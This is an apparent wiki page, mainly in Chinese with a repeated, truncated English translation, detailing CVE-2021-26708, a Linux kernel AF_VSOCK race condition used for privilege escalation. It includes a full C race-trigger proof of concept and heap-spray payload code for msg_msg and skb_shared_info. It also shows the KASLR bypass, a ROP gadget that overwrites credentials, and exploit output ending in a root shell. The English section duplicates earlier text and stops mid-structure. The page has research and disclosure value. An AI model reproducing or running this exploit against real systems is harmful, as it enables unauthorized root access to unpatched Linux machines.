CVE-2021-26708_Linux_kernel_before_5.10.13_特權提升漏洞

# CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/en

==Vulnerability==

These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.

CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.

vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.

==Memory corruption==

The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :

  setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                &size, sizeof(unsigned long));

The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:

struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:

     if (vsk->transport) {
            if (vsk->transport == new_transport)
                return 0;

            /* transport->release() must be called with sock lock acquired.
             * This path can only be taken during vsock_stream_connect(),
             * where we have already held the sock lock.
             * In the other cases, this function is called on a new socket
             * which is not assigned to any transport.
             */
            vsk->transport->release(vsk);
            vsock_deassign_transport(vsk);
        }

vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).

When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:

void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}

这里，vvs是指向内核内存的指针，它已经在virtio_transport_destruct()中被释放。struct virtio_vsock_sock的大小为64字节，位于kmalloc-64块缓存中。buf_alloc字段类型为u32，位于偏移量40。VIRTIO_VSOCK_MAX_BUF_SIZE是0xFFFFFFFFUL。*val的值由攻击者控制，它的四个最不重要的字节被写入释放的内存中。

==模糊測試==

syzkaller fuzzer沒有辦法重現這個崩潰，於是我決定自行研究。但為什麼fuzzer會失敗呢？觀察vsock_update_buffer_size()有所發現：

 if (val != vsk->buffer_size &&
      transport && transport->notify_buffer_size)
        transport->notify_buffer_size(vsk, &val);

    vsk->buffer_size = val;

只有當val與當前的buffer_size不同時，才會調用notify_buffer_size()，也就是說setsockopt()執行SO_VM_SOCKETS_BUFFER_SIZE時，每次調用的size參數都應該不同。於是我構建了相關代碼:

/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov .
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

int thread_sync(long lag_nsec)
{
	int ret = -1;
	struct timespec ts0;
	struct timespec ts;
	long delta_nsec = 0;

	ret = pthread_barrier_wait(&barrier);
	if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
		perror("[-] pthread_barrier_wait");
		return EXIT_FAILURE;
	}

	ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
	if (ret != 0) {
		perror("[-] clock_gettime");
		return EXIT_FAILURE;
	}

	while (delta_nsec < lag_nsec) {
		ret = clock_gettime(CLOCK_MONOTONIC, &ts);
		if (ret != 0) {
			perror("[-] clock_gettime");
			return EXIT_FAILURE;
		}

		delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
						ts.tv_nsec - ts0.tv_nsec;
	}

	return EXIT_SUCCESS;
}

void *th_connect(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
	};

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	addr.svm_cid = VMADDR_CID_LOCAL;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	addr.svm_cid = VMADDR_CID_HYPERVISOR;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	return NULL;
}

void *th_setsockopt(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct timespec tp;
	unsigned long size = 0;

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	clock_gettime(CLOCK_MONOTONIC, &tp);
	size = tp.tv_nsec;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
						&size, sizeof(unsigned long));

	return NULL;
}

int main(void)
{
	int ret = -1;
	unsigned long size = 0;
	long loop = 0;
	pthread_t th[2] = { 0 };

	vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (vsock == -1)
		err_exit("[-] open vsock");

	printf("[+] AF_VSOCK socket is opened\n");

	size = 1;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
						&size, sizeof(unsigned long));
	size = 0xfffffffffffffffdlu;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
						&size, sizeof(unsigned long));

	ret = pthread_barrier_init(&barrier, NULL, 2);
	if (ret != 0)
		err_exit("[-] pthread_barrier_init");

	for (loop = 0; loop < 30000; loop++) {
		long tmo1 = 0;
		long tmo2 = loop % MAX_RACE_LAG_USEC;

		printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

		ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
		if (ret != 0)
			err_exit("[-] pthread_create #0");

		ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
		if (ret != 0)
			err_exit("[-] pthread_create #1");

		ret = pthread_join(th[0], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #0");

		ret = pthread_join(th[1], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #1");

		if (tfail) {
			printf("[-] some thread got troubles\n");
			exit(EXIT_FAILURE);
		}
	}

	ret = close(vsock);
	if (ret)
		perror("[-] close");

	printf("[+] now see your warnings in the kernel log\n");
	return 0;
}

這裡的size值取自clock_gettime()返回的納秒數，每次都可能不同。原始的syzkaller不會這麼處理，因為在syzkaller生成 fuzzing輸入時，syscall參數的值被確定，執行時不會改變。

==四字節的力量==

這裡我選擇Fedora 33 Server作為研究目標，內核版本為5.10.11-200.fc33.x86_64，並決心繞過SMEP和SMAP。

第一步，我開始研究穩定的堆噴射，該漏洞利用執行用戶空間的活動，使內核在釋放的virtio_vsock_sock的位置分配另一個64字節的對象。經過幾次實驗性嘗試後，確認釋放的virtio_vsock_sock被覆蓋，說明堆噴射是可行的。最終我找到了msgsnd() syscall。它在內核空間中創建了struct msg_msg，見pahole輸出：

struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};

前面是消息頭，後面是消息數據。如果用戶空間中的struct msgbuf有一個16字節的mtext，則會在kmalloc-64塊緩存中創建相應的msg_msg。 4字節的write-after-free會破壞偏移量40的void *security指針。 msg_msg.security字段指向由lsm_msg_msg_alloc()分配的內核數據，當收到 msg_msg時，就會被security_msg_msg_free()釋放。因此，破壞security指針的前半部分，就能獲得 arbitrary free。

==內核信息洩露==

這裡使用了[https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E CVE-2019-18683]相同的技巧。虛擬套接字的第二個connect()調用vsock_deassign_transport()，將vsk->transport設置為NULL，使得vsock_stream_setsockopt()在內存崩潰後調用virtio_transport_send_pkt_info()，出現內核告警：

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
  vsock_update_buffer_size+0x5f/0x70 [vsock]
  vsock_stream_setsockopt+0x128/0x270 [vsock]
...

通過gdb調試，發現RCX寄存器包含了釋放的virtio_vsock_sock的內核地址，RBX寄存器包含了vsock_sock的內核地址。

==實現任意讀==

===從 arbitrary free 到 use-after-free===

從洩露的內核地址釋放一個對象
執行堆噴，用受控數據覆蓋該對象
使用損壞的對象進行權限升級
內核實現的System V消息有限制最大值DATALEN_MSG，即PAGE_SIZE減去sizeof(struct msg_msg))。如果你發送了更大的消息，剩餘的消息會被保存在消息段的列表中。 msg_msg中包含struct msg_msgseg *next用於指向第一個段，size_t m_ts用於存儲大小。當進行覆蓋操作時，就可以把受控的值放在msg_msg.m_ts和msg_msg.next中：

![](/static/pwnwiki/img/T01a51dfe7a996e854c.png )

Payload:

    #define PAYLOAD_SZ 40 
    void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
    {
        struct msg_msg *msg_ptr;

        xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

        /* Don't touch the second part to avoid breaking page fault delivery */
        memset(spray_data, 0xa5, PAGE_SIZE * 4);

        printf("[+] adapt the msg_msg spraying payload:\n");
        msg_ptr = (struct msg_msg *)xattr_addr;
        msg_ptr->m_type = 0x1337;
        msg_ptr->m_ts = ARB_READ_SZ;
        msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
        printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
               msg_ptr,
               msg_ptr->m_type, &(msg_ptr->m_type),
               msg_ptr->m_ts, &(msg_ptr->m_ts),
               msg_ptr->next, &(msg_ptr->next));
    }

但是如何使用msg_msg讀取內核數據呢？通過閱讀msgrcv()系統調用文檔，我找到了好解決方案，使用msgrcv()和MSG標誌：

MSG_COPY (since Linux 3.8)
        Nondestructively fetch a copy of the message at the ordinal position  in  the  queue
        specified by msgtyp (messages are considered to be numbered starting at 0).

這個標誌使內核將消息數據複製到用戶空間，不從消息隊列中刪除。如果內核有CONFIG_CHECKPOINT_RESTORE=y，則MSG是可用的，在Fedora Server適用。

===任意讀的步驟===

準備工作：
使用sched_getaffinity()和CPU_COUNT()計算可用的CPU數量（該漏洞至少需要兩個）;
打開/dev/kmsg進行解析;
mmap()將spray_data內存區域配置userfaultfd()作為最後一部分;
啟動一個單獨的pthread來處理userfaultfd()事件;
啟動127個threads用於msg_msg上的setxattr()&userfaultfd()堆噴射，並將它們掛在thread_barrier上;
獲取原始msg_msg的內核地址:
在虛擬套接字上進行條件競爭;
在第二個connect()後，在忙循環中等待35微秒;
調用msgsnd()來建立一個單獨的消息隊列；在內存破壞後，msg_msg對像被放置在virtio_vsock_sock位置;
解析內核日誌，從內核警告（RCX寄存器）中保存msg_msg的內核地址;
同時，從RBX寄存器中保存vsock_sock的內核地址;
使用損壞的 msg_msg對原始msg_msg執行任意釋放:
使用原始 msg_msg地址的4個字節作為 SO_VM_SOCKETS_BUFFER_SIZE，用於實現內存破壞；
在虛擬套接字上進行條件競爭；
在第二個connect()之後馬上調用msgsnd()；msg_msg被放置在virtio_vsock_sock的位置，實現破壞；
現在被破壞的msg_msg的security指針存儲原始msg_msg的地址(來自步驟2)；

![](/static/pwnwiki/img/T01a2a2d47c9494c4a5.png )

如果在處理 msgsnd() 的過程中發生了來自 setsockopt()線程的 msg_msg.security內存損壞，進而SELinux權限檢查失敗；
在這種情況下，msgsnd()返回-1，損壞的msg_msg被銷毀；釋放msg_msg.security可以釋放原始msg_msg；
用一個可控的payload 覆蓋原始msg_msg：
msgsnd()失敗後，漏洞就會調用pthread_barrier_wait()，調用127個用於堆噴射的pthreads；
這些pthreads執行setxattr()的payload；
原始msg_msg被可控的數據覆蓋，msg_msg.next指針存儲vsock_sock對象的地址；

![](/static/pwnwiki/img/T0140baae964febb059.png )

通過從存儲被覆蓋的 msg_msg的消息隊列中接收消息，將vsock_sock內核對象的內容讀到用戶空間：

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
                IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

==尋找攻擊目標==

以下是我找到的點：
1.專用的塊緩存，如PINGv6和sock_inode_cache有很多指向對象的指針
2.struct mem_cgroup *sk_memcg指針在vsock_sock.sk偏移量664處。 mem_cgroup結構是在kmalloc-4k塊緩存中分配的。
3.const struct cred *owner指針在vsock_sock.sk偏移量840處，存儲了可以覆蓋進行權限升級的憑證的地址。
4.void (*sk_write_space)(struct sock *)函數指針在vsock_sock.sk偏移量688處，被設置為sock_def_write_space()內核函數的地址。它可以用來計算KASLR偏移量。

下面是該漏洞如何從內存中提取這些指針:

#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET    840
#define OWNER_CRED_RD_LOCATION    (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET    688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET) 
/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 *   function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu 
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

    sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
            sk_memcg, SK_MEMCG_RD_LOCATION);

    owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
            owner_cred, OWNER_CRED_RD_LOCATION);

    sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
            sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

    kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);

==在 sk_buff 上實現 Use-after-free==

Linux內核中與網絡相關的緩衝區用struct sk_buff表示，這個對像中有skb_shared_info與destructor_arg，可以用於控制流劫持。網絡數據和skb_shared_info被放置在由sk_buff.head指向的同一個內核內存塊中。因此，在用戶空間中創建一個2800字節的網絡數據包會使skb_shared_info被分配到kmalloc-4k塊緩存中，mem_cgroup對像也是如此。

我構建了以下步驟：

1.使用socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)創建一個客戶端套接字和32個服務器套接字

2.在用戶空間中準備一個2800字節的緩衝區，並用0x42對其memset()

3.用sendto()將這個緩衝區從客戶端套接字發送到每個服務器套接字，用於在kmalloc-4k中創建sk_buff對象。在每個可用的CPU上使用`sched_setaffinity()

4.對vsock_sock執行任意讀取過程

5.計算可能的sk_buff內核地址為sk_memcg加4096(kmalloc-4k的下一個元素)

6.對這個可能的sk_buff地址執行任意讀

7.如果在網絡數據的位置找到0x42424242424242lu，則找到真正的sk_buff，進入步驟8。否則，在可能的sk_buff地址上加4096，轉到步驟6

8.sk_buff上執行32個pthreads的setxattr()&userfaultfd()堆噴射，並把它們掛在pthread_barrier上

9.對sk_buff內核地址進行任意釋放

10.調用pthread_barrier_wait()，執行32個setxattr()覆蓋skb_shared_info的堆噴pthreads

11.使用recv()接收服務器套接字的網絡消息。

==通過skb_shared_info 進行任意寫==

以下是覆蓋sk_buff對象的有效payload：

#define SKB_SIZE        4096
#define SKB_SHINFO_OFFSET    3776
#define MY_UINFO_OFFSET        256
#define SKBTX_DEV_ZEROCOPY    (1 << 3) 
void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

skb_shared_info駐留在噴射數據中，正好在偏移量SKB_SHINFO_OFFSET處，即3776字節。 skb_shared_info.destructor_arg指針存儲了struct ubuf_info的地址。因為被攻擊的sk_buff的內核地址是已知的，所以能在網絡緩衝區的MY_UINFO_OFFSET處創建了一個假的ubuf_info。下面是有效payload的佈局：

![](/static/pwnwiki/img/T0185ccbf9f025c74da.png )

下面講講destructor_arg 回調:

 /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */

由於在vmlinuz-5.10.11-200.fc33.x86_64中找不到一個能滿足我需求的gadget，所以我自己進行了研究構造。

callback函數指針存儲一個ROP gadget 地址，RDI存儲callback函數的第一個參數，也就是ubuf_info本身的地址，RDI + 8指向ubuf_info.desc。 gadget 將ubuf_info.desc移動到RDX。現在RDX包含有效用戶ID和組ID的地址減一個字節。這個字節很重要：當gadget從 RSI向 RDX指向的內存中寫入消息1時，有效的 uid和 gid將被零覆蓋。重複同樣的過程，直到權限升級到root。整個過程輸出流如下：

[a13x@localhost ~]$ ./vsock_pwn

=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================

[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready

[+] stage I: collect good msg_msg locations
[+] go racing, show wins: 
    save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
    save msg_msg ffff9125c25a4640 in msq 12 in slot 1
    save msg_msg ffff9125c25a4780 in msq 22 in slot 2
    save msg_msg ffff9125c3668a40 in msq 78 in slot 3

[+] stage II: arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4d00
    kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins: 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000

[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4640
    kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11 
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb

[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
    start at 0x7f0d91120004
    skb_shared_info at 0x7f0d91120ec4
    tx_flags 0x8
    destructor_arg 0xffff9125c42fa100
    callback 0xffffffffab64f6d4
    desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30 

[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

==視頻==

https://www.youtube.com/watch?v=EC8PFOYOUgU

==參考==

https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==

vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.

==Memory corruption==

  setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                &size, sizeof(unsigned long));

The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:

struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:

     if (vsk->transport) {
            if (vsk->transport == new_transport)
                return 0;

            /* transport->release() must be called with sock lock acquired.
             * This path can only be taken during vsock_stream_connect(),
             * where we have already held the sock lock.
             * In the other cases, this function is called on a new socket
             * which is not assigned to any transport.
             */
            vsk->transport->release(vsk);
            vsock_deassign_transport(vsk);
        }

When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:

void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}

Here, vvs is a pointer to the kernel memory, which has been released in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes and is located in the kmalloc-64 block cache. The buf_alloc field type is u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least important bytes are written into the freed memory.

==Fuzzing==

The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:

 if (val != vsk->buffer_size &&
      transport && transport->notify_buffer_size)
        transport->notify_buffer_size(vsk, &val);

    vsk->buffer_size = val;

Only when val is different from the current buffer_size, will notify_buffer_size() be called, that is to say, when setsockopt() executes SO_VM_SOCKETS_BUFFER_SIZE, every time The size parameters of the call should all be different. So I built the relevant code:

/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov .
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

int thread_sync(long lag_nsec)
{
	int ret = -1;
	struct timespec ts0;
	struct timespec ts;
	long delta_nsec = 0;

	ret = pthread_barrier_wait(&barrier);
	if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
		perror("[-] pthread_barrier_wait");
		return EXIT_FAILURE;
	}

	ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
	if (ret != 0) {
		perror("[-] clock_gettime");
		return EXIT_FAILURE;
	}

	while (delta_nsec < lag_nsec) {
		ret = clock_gettime(CLOCK_MONOTONIC, &ts);
		if (ret != 0) {
			perror("[-] clock_gettime");
			return EXIT_FAILURE;
		}

		delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
						ts.tv_nsec - ts0.tv_nsec;
	}

	return EXIT_SUCCESS;
}

void *th_connect(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
	};

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	addr.svm_cid = VMADDR_CID_LOCAL;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	addr.svm_cid = VMADDR_CID_HYPERVISOR;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	return NULL;
}

void *th_setsockopt(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct timespec tp;
	unsigned long size = 0;

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	clock_gettime(CLOCK_MONOTONIC, &tp);
	size = tp.tv_nsec;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
						&size, sizeof(unsigned long));

	return NULL;
}

int main(void)
{
	int ret = -1;
	unsigned long size = 0;
	long loop = 0;
	pthread_t th[2] = { 0 };

	vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (vsock == -1)
		err_exit("[-] open vsock");

	printf("[+] AF_VSOCK socket is opened\n");

	size = 1;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
						&size, sizeof(unsigned long));
	size = 0xfffffffffffffffdlu;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
						&size, sizeof(unsigned long));

	ret = pthread_barrier_init(&barrier, NULL, 2);
	if (ret != 0)
		err_exit("[-] pthread_barrier_init");

	for (loop = 0; loop < 30000; loop++) {
		long tmo1 = 0;
		long tmo2 = loop % MAX_RACE_LAG_USEC;

		printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

		ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
		if (ret != 0)
			err_exit("[-] pthread_create #0");

		ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
		if (ret != 0)
			err_exit("[-] pthread_create #1");

		ret = pthread_join(th[0], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #0");

		ret = pthread_join(th[1], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #1");

		if (tfail) {
			printf("[-] some thread got troubles\n");
			exit(EXIT_FAILURE);
		}
	}

	ret = close(vsock);
	if (ret)
		perror("[-] close");

	printf("[+] now see your warnings in the kernel log\n");
	return 0;
}

The size value here is taken from the number of nanoseconds returned by clock_gettime(), which may be different each time. The original syzkaller will not do this, because when syzkaller generates fuzzing input, the value of the syscall parameter is determined and will not change during execution.

== The power of four bytes ==

Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.

In the first step, I started to study stable heap spraying, which exploited the execution of user space activities to cause the kernel to allocate another 64-byte object at the location of the released virtio_vsock_sock. After several experimental attempts, it was confirmed that the released virtio_vsock_sock was overwritten, indicating that heap spraying is feasible. Finally I found msgsnd() syscall. It creates struct msg_msg in the kernel space, see pahole output:

struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
